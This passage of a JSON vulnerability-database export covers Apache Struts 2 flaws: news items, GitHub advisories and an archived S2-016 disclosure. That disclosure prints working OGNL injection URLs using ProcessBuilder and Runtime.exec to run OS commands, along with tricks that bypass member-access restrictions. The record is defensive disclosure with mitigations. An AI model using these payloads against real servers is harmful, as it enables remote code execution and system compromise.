"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T23:00:06", "description": "Developers behind the Apache Struts framework have released an update that fixes two vulnerabilities.\n\nCreators of the open-source web application framework are encouraging users to upgrade to Struts 2.3.15.2 immediately.\n\nOne of the fixes addresses [an issue](<http://struts.apache.org/release/2.3.x/docs/s2-019.html>) (CVE-2013-4316) in the Dynamic Method Invocation (DMI) feature that was previously thought to break users\u2019 applications if relied on too heavily. 
It was previously enabled by default and flashed a warning that users should switch it off if possible. Now the feature is disabled by default \u2013 or if users want to employ a workaround, they can switch struts.enable.DynamicMethodInvocation to false in struts.xml.\n\nThe second fix involves a broken access control [vulnerability issue](<http://struts.apache.org/release/2.3.x/docs/s2-018.html>) (CVE-2013-4310) with Struts 2\u2019s action mapping mechanism. A parameter in the mechanism was set up to support the prefix \u201caction:\u201d to make sure navigational information can be attached to buttons in forms. Unfortunately, \u201cunder certain conditions\u201d attackers could have used this feature to bypass security constraints. The update fixes the mechanism and restricts security constraints. Like the DMI issue, there\u2019s a workaround: writing your own ActionMapper and dropping support for \u201caction:\u201d.\n\nPart of the Apache Software Foundation, Struts is used by developers to build Java-based web apps. 
Those interested in learning more about the fixes can head to Apache\u2019s [version notes](<http://struts.apache.org/release/2.3.x/docs/version-notes-23152.html>) on Struts 2.3.15.2 and download what Apache is calling the \u201cbest available\u201d version of the framework [on its site](<http://struts.apache.org/download.cgi#struts23152>).\n", "cvss3": {}, "published": "2013-09-23T13:03:17", "type": "threatpost", "title": "Apache Upgrade Repairs Struts, Fixes Two Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-4310", "CVE-2013-4316"], "modified": "2013-09-27T14:31:38", "id": "THREATPOST:F3CCF4A5ECFE4B0E862CEE7C1076E03E", "href": "https://threatpost.com/apache-upgrade-repairs-struts-fixes-two-vulnerabilities/102385/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:37", "description": "VMware has patched several serious security vulnerabilities in its vCenter Operations Center Management suite, one of which could lead to remote code execution on vulnerable machines.\n\nAll of the vulnerabilities that the company [patched](<http://www.vmware.com/security/advisories/VMSA-2014-0007.html>) lie in the Apache Struts Java application framework, and the most serious of them is CVE-2014-0112, which allows an attacker to run arbitrary code.\n\n\u201cParametersInterceptor in Apache Struts before 2.3.16.2 does not properly restrict access to the getClass method, which allows remote attackers to \u201cmanipulate\u201d the ClassLoader and execute arbitrary code via a crafted request,\u201d the vulnerability [description](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0112>) says.\n\nApache [fixed](<https://struts.apache.org/announce.html>) the vulnerability in a new release of Struts back in April. The issue was created because of an incomplete patch for a previous vulnerability in Struts. 
The three Struts vulnerabilities all are addressed in the release of version 5.8.2 of VMware vCOPS, the company said.\n\nThe other two, less serious vulnerabilities fixed in the new version of vCOPS are CVE-2014-0050 and CVE-2014-0094. The first flaw is a problem that could lead to a denial-of-service condition if exploited by a remote attacker.\n\n\u201cMultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop\u2019s intended exit conditions,\u201d the [advisory](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0050>) says.\n\nCVE-2014-0094 is also remotely exploitable by an unauthenticated attacker, who could manipulate a component of Struts.\n\n\u201cThe ParametersInterceptor in Apache Struts before 2.3.16.1 allows remote attackers to \u201cmanipulate\u201d the ClassLoader via the class parameter, which is passed to the getClass method,\u201d the [advisory](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0094>) says.\n", "cvss3": {}, "published": "2014-06-25T13:59:49", "type": "threatpost", "title": "VMware Patches Apache Struts Flaws in vCOPS", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0050", "CVE-2014-0094", "CVE-2014-0112"], "modified": "2014-06-25T19:22:45", "id": "THREATPOST:40B4CEF304ADBCA0734F292661E7810B", "href": "https://threatpost.com/vmware-patches-apache-struts-flaws-in-vcops/106858/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-10-14T22:21:14", "description": "Proof-of-concept exploit code surfaced on GitHub on Friday, raising the stakes on two existing Apache Struts 2 bugs that allow for remote code-execution and denial-of-service attacks on vulnerable installations.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) issued an 
alert regarding the two bugs, tracked as [CVE-2019-0230](<https://cwiki.apache.org/confluence/display/WW/S2-059>) and [CVE-2019-0233](<https://cwiki.apache.org/confluence/display/WW/S2-060>). Impacted are Apache Struts versions 2.0.0 through 2.5.20. Remediation includes upgrading to Struts 2.5.22, according to the Apache Struts Security Team.\n\nStruts 2 is an open-source coding framework and library for enterprise developers popular with developers and companies when creating Java-based applications. Both the exploitable vulnerabilities in question were fixed last November.\n\nResearchers have warned of outdated installations of Apache Struts 2 and that [if left unpatched](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>) they can open the door to more critical holes similar to a bug at the root of the [massive Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)).\n\n## **PoC Released to GitHub**\n\nThe proof-of-concept (PoC) [released this week](<https://github.com/cellanu/cve-2019-0230>) raises the greatest concern with CVE-2019-0230, originally rated important when first uncovered by Matthias Kaiser at Apple Information Security. The bug is triggered when a threat actor sends malicious Object-Graph Navigation Language (OGNL) expressions that can then open the door for a remote code-execution attack, according to the security bulletin. OGNL is a Java language that can let attackers access data objects, and then use them to create and inject server-side code.\n\n\u201cSuccessful exploitation of the most severe of these vulnerabilities (CVE-2019-0230) could allow for remote code-execution in the context of the affected application. 
Depending on the privileges associated with the application, an attacker could install programs; view, change or delete data; or create new accounts with full user rights,\u201d according to a bulletin issued Friday by the Multi-State Information Sharing & Analysis Center at the Center for Internet Security.\n\nWhile the PoC attack and exploit posted to GitHub targets CVE-2019-0230, the Apache Struts Security Team also urged users to patch for the DoS bug (CVE-2019-0233). The vulnerability affects the write permissions of file directories that could lead to conditions ripe for a DoS attack.\n\nAccording to the Apache Struts 2 Wiki description of the bug, this flaw can be triggered with a file upload to a Struts Action that exposes the file.\n\n\u201cAn attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container\u2019s temp directory to read only, such that subsequent upload actions will fail,\u201d [according to the description](<https://cwiki.apache.org/confluence/display/WW/S2-060>).\n\nThe Apache security bulletin recommends upgrading to the most recent version of Apache Struts. It also suggests security teams verify no unauthorized system modifications have occurred on the system before applying the patch, and they run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.\n", "cvss3": {}, "published": "2020-08-14T21:20:01", "type": "threatpost", "title": "PoC Exploit Targeting Apache Struts Surfaces on GitHub", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-5135"], "modified": "2020-08-14T21:20:01", "id": "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "href": "https://threatpost.com/poc-exploit-github-apache-struts/158393/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:03", "description": "\nApache Struts2 2.0.0 2.3.15 - Prefixed Parameters OGNL Injection", "cvss3": {}, "published": "2014-01-14T00:00:00", "type": "exploitpack", "title": "Apache Struts2 2.0.0 2.3.15 - Prefixed Parameters OGNL Injection", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2248", 
"CVE-2013-2251"], "modified": "2014-01-14T00:00:00", "id": "EXPLOITPACK:C0CFCAABB02FC4AC5D0EF38D381E1E35", "href": "", "sourceData": "CVE Number: CVE-2013-2251\nTitle: Struts2 Prefixed Parameters OGNL Injection Vulnerability\nAffected Software: Apache Struts v2.0.0 - 2.3.15\nCredit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.\nIssue Status: v2.3.15.1 was released which fixes this vulnerability\nIssue ID by Vendor: S2-016\n\nOverview:\n Struts2 is an open-source web application framework for Java.\n Struts2 (v2.0.0 - 2.3.15) is vulnerable to remote OGNL injection which\n leads to arbitrary Java method execution on the target server. This is\n caused by insecure handling of prefixed special parameters (action:,\n redirect: and redirectAction:) in DefaultActionMapper class of Struts2.\n\nDetails:\n <About DefaultActionMapper>\n\n Struts2's ActionMapper is a mechanism for mapping between incoming HTTP\n request and action to be executed on the server. DefaultActionMapper is\n a default implementation of ActionMapper. It handles four types of\n prefixed parameters: action:, redirect:, redirectAction: and method:.\n\n For example, redirect prefix is used for HTTP redirect.\n\n Normal redirect prefix usage in JSP:\n <s:form action=\"foo\">\n ...\n <s:submit value=\"Register\"/>\n <s:submit name=\"redirect:http://www.google.com/\" value=\"Cancel\"/>\n </s:form>\n\n If the cancel button is clicked, redirection is performed.\n\n Request URI for redirection:\n /foo.action?redirect:http://www.google.com/\n\n Response Header:\n HTTP/1.1 302 Found\n Location: http://www.google.com/\n\n Usage of other prefixed parameters is similar to redirect.\n See Struts2 document for details.\n https://cwiki.apache.org/confluence/display/WW/ActionMapper\n\n <How the Attack Works>\n\n As stated already, there are four types of prefixed parameters.\n\n action:, redirect:, redirectAction:, method:\n\n All except for method: can be used for attacks. 
But regarding action:,\n it can be used only if wildcard mapping is enabled in configuration.\n On the one hand, redirect: and redirectAction: are not constrained by\n configuration (thus they are convenient for attackers).\n\n One thing that should be noted is that prefixed parameters are quite\n forceful. It means that behavior of application which is not intended\n to accept prefixed parameters can also be overwritten by prefixed\n parameters added to HTTP request. Therefore all Struts2 applications\n that use DefaultActionMapper are vulnerable to the attack.\n\n The injection point is name of prefixed parameters.\n Example of attack using redirect: is shown below.\n\n Attack URI:\n /bar.action?redirect:http://www.google.com/%25{1000-1}\n\n Response Header:\n HTTP/1.1 302 Found\n Location: http://www.google.com/999\n\n As you can see, expression (1000-1) is evaluated and the result (999)\n appears in Location response header. As I shall explain later,\n more complex attacks such as OS command execution are possible too.\n\n In DefaultActionMapper, name of prefixed parameter is once stored as\n ActionMapping object and is later executed as OGNL expression.\n Rough method call flow in execution phase is as the following.\n\n org.apache.struts2.dispatcher.ng.filter.StrutsExecuteFilter.doFilter()\n org.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction()\n org.apache.struts2.dispatcher.Dispatcher.serviceAction()\n org.apache.struts2.dispatcher.StrutsResultSupport.execute()\n org.apache.struts2.dispatcher.StrutsResultSupport.conditionalParse()\n com.opensymphony.xwork2.util.TextParseUtil.translateVariables()\n com.opensymphony.xwork2.util.OgnlTextParser.evaluate()\n\nProof of Concept:\n <PoC URLs>\n\n PoC is already disclosed on vendor's web page.\n https://struts.apache.org/release/2.3.x/docs/s2-016.html\n\n Below PoC URLs are just quotes from the vendor's page.\n\n Simple Expression:\n http://host/struts2-blank/example/X.action?action:%25{3*4}\n 
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}\n\n OS Command Execution:\n http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\n http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\n http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\n\n Obviously such attacks are not specific to blank/showcase application,\n but all Struts2 based applications may be subject to attacks.\n\n <OS Command Execution and Static Method Call>\n\n Another topic that I think worth mentioning is that PoC URLs use\n ProcessBuilder class to execute OS commands. The merit of using this\n class is that it does not require static method to execute OS commands,\n while Runtime class does require it.\n\n As you may know, static method call in OGNL is basically prohibited.\n But in Struts2 <= v2.3.14.1 this restriction was easily bypassed by\n a simple trick:\n\n %{#_memberAccess['allowStaticMethodAccess']=true,\n @java.lang.Runtime@getRuntime().exec('your commands')}\n\n In Struts v2.3.14.2, SecurityMemberAccess class has been changed to\n prevent the trick. However there are still some techniques to call\n static method in OGNL.\n\n One technique is to use reflection to replace static method call to\n instance method call. 
Another technique is to overwrite #_memberAccess\n object itself rather than property of the object:\n\n %{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true),\n @java.lang.Runtime@getRuntime().exec('your commands')}\n\n Probably prevention against static method is just an additional layer\n of defense, but I think that global objects such as #_memberAccess\n should be protected from rogue update.\n\nTimeline:\n 2013/06/24 Reported to Struts Security ML\n 2013/07/17 Vendor announced v2.3.15.1\n 2013/08/10 Disclosure of this advisory\n\nRecommendation:\n Immediate upgrade to the latest version is strongly recommended as\n active attacks have already been observed. It should be noted that\n redirect: and redirectAction: parameters were completely dropped and\n do not work in the latest version as stated in the vendor's page.\n Thus attention for compatibility issues is required for upgrade.\n\n If you cannot upgrade your Struts2 immediately, filtering (by custom\n servlet filter, IPS, WAF and so on) can be a mitigation solution for\n this vulnerability. 
Some points about filtering solution are listed\n below.\n\n - Both %{expr} and ${expr} notation can be used for attacks.\n - Parameters both in querystring and in request body can be used.\n - redirect: and redirectAction: can be used not only for Java method\n execution but also for open redirect.\n\n See S2-017 (CVE-2013-2248) for open redirect issue.\n https://struts.apache.org/release/2.3.x/docs/s2-017.html\n\nReference:\n https://struts.apache.org/release/2.3.x/docs/s2-016.html\n https://cwiki.apache.org/confluence/display/WW/ActionMapper", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "github": [{"lastseen": "2023-09-27T22:06:16", "description": "Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.", "cvss3": {}, "published": "2022-05-14T01:57:02", "type": "github", "title": "Arbitrary code execution in Apache Struts 2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2134", "CVE-2013-2135"], "modified": "2023-08-16T09:30:59", "id": "GHSA-GQQM-564F-VVXQ", "href": "https://github.com/advisories/GHSA-gqqm-564f-vvxq", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-27T22:06:41", "description": "CookieInterceptor in Apache Struts 2.x before 2.3.20, when a wildcard cookiesName value is used, does not properly restrict access to the getClass method, which 
allows remote attackers to \"manipulate\" the ClassLoader and modify session state via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0113.", "cvss3": {}, "published": "2022-05-14T00:54:14", "type": "github", "title": "ClassLoader manipulation in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0113", "CVE-2014-0116"], "modified": "2023-02-01T05:04:18", "id": "GHSA-HMHQ-382Q-MP56", "href": "https://github.com/advisories/GHSA-hmhq-382q-mp56", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-09-27T22:06:41", "description": "ParametersInterceptor in Apache Struts before 2.3.20 does not properly restrict access to the getClass method, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via a crafted request. 
NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0094.", "cvss3": {}, "published": "2022-05-14T00:54:16", "type": "github", "title": "ClassLoader manipulation in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2014-0112"], "modified": "2023-02-01T05:04:26", "id": "GHSA-PRJV-JJ26-WF8H", "href": "https://github.com/advisories/GHSA-prjv-jj26-wf8h", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-27T22:06:41", "description": "CookieInterceptor in Apache Struts before 2.3.20, when a wildcard cookiesName value is used, does not properly restrict access to the getClass method, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via a crafted request. 
NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0094.", "cvss3": {}, "published": "2022-05-14T00:54:15", "type": "github", "title": "ClassLoader manipulation in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2014-0113"], "modified": "2023-02-01T05:04:17", "id": "GHSA-3C5C-XRQ4-QHR8", "href": "https://github.com/advisories/GHSA-3c5c-xrq4-qhr8", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-14T23:36:58", "description": "The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.", "cvss3": {}, "published": "2022-05-17T01:42:17", "type": "github", "title": "Cross-Site Request Forgery in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4386"], "modified": "2023-08-14T22:56:16", "id": 
"GHSA-2RVH-Q539-Q33V", "href": "https://github.com/advisories/GHSA-2rvh-q539-q33v", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-17T01:09:02", "description": "When the Struts2 debug mode is turned on, under certain conditions an arbitrary script may be executed in the 'Problem Report' screen. Also if JSP files are exposed to be accessed directly it's possible to execute an arbitrary script. \n\nIt is generally not advisable to have debug mode switched on outside of the development environment. Debug mode should always be turned off in production setup. Also never expose JSPs files directly and hide them inside WEB-INF folder or define dedicated security constraints to block access to raw JSP files.\n\nStruts >= 2.3.20 is not vulnerable to this attack. We recommend upgrading to Struts 2.3.20 or higher.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-05-14T01:57:02", "type": "github", "title": "Cross-site Scripting in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5169"], "modified": "2023-02-01T05:04:26", "id": "GHSA-VWHV-J36G-5RM8", "href": 
"https://github.com/advisories/GHSA-vwhv-j36g-5rm8", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-23T14:50:40", "description": "In Apache Struts 2.0.1 through 2.3.33 and 2.5 through 2.5.10, using an unintentional expression in a Freemarker tag instead of string literals can lead to a RCE attack.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-16T19:35:40", "type": "github", "title": "Apache Struts 2.0.1 uses an unintentional expression in a Freemarker tag instead of string literal", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12611"], "modified": "2023-01-09T05:02:49", "id": "GHSA-8FX9-5HX8-CRHM", "href": "https://github.com/advisories/GHSA-8fx9-5hx8-crhm", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-22T22:10:22", "description": "Multiple Cross-Site Scripting (XSS) in XWork generated error pages in Apache Struts. By default, XWork doesn't escape action's names in automatically generated error page, allowing for a successful XSS attack. 
When Dynamic Method Invocation (DMI) is enabled, the action name is generated dynamically based on request parameters. This allows a call to a non-existing page and method to produce an error page with injected code as below. As of Struts 2.2.3 the action names are escaped when automatically generated error pages are rendered.", "cvss3": {}, "published": "2022-05-17T05:35:28", "type": "github", "title": "Cross-site Scripting in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1772"], "modified": "2023-02-01T05:04:19", "id": "GHSA-56F8-G68R-J699", "href": "https://github.com/advisories/GHSA-56f8-g68r-j699", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-09-17T01:04:41", "description": "The Struts 2 action mapping mechanism supports the special parameter prefix action: which is intended to help with attaching navigational information to buttons within forms; under certain conditions this can be used to bypass security constraints. \n\nIn Struts 2.3.15.3 the action mapping mechanism was changed to avoid circumventing security constraints. 
Two additional constants were introduced to steer behaviour of DefaultActionMapper:\n\n- struts.mapper.action.prefix.enabled - when set to false support for \"action:\" prefix is disabled, set to false by default\n- struts.mapper.action.prefix.crossNamespaces - when set to false, actions defined with \"action:\" prefix must be in the same namespace as current action\n\n", "cvss3": {}, "published": "2022-05-17T04:44:52", "type": "github", "title": "Apache Struts2 Broken Access Control Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4310"], "modified": "2023-08-15T19:02:22", "id": "GHSA-Q5Q8-JGHF-3PM3", "href": "https://github.com/advisories/GHSA-q5q8-jghf-3pm3", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-08-16T05:26:48", "description": "Apache Struts 2.0.0 through 2.3.x before 2.3.20 uses predictable <s:token/> values, which allows remote attackers to bypass the CSRF protection mechanism.", "cvss3": {}, "published": "2022-05-14T02:50:59", "type": "github", "title": "Cross-Site Request Forgery in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7809"], "modified": "2023-08-16T05:02:13", "id": "GHSA-H4V9-JF2R-9H6M", "href": "https://github.com/advisories/GHSA-h4v9-jf2r-9h6m", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T14:56:47", "description": "Cross-site scripting (XSS) vulnerability in the URLDecoder function in JRE before 1.8, as used in Apache Struts 2.x before 2.3.28, when using a single byte page encoding, allows remote attackers to inject arbitrary web script or HTML via multi-byte characters in a url-encoded parameter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-05-14T01:57:01", "type": "github", "title": "Cross-site Scripting in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4003"], "modified": "2023-02-01T05:04:17", "id": "GHSA-M3X6-9V6H-4G28", "href": "https://github.com/advisories/GHSA-m3x6-9v6h-4g28", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-09-17T01:06:34", "description": "ValueStack defines special top object which represents root 
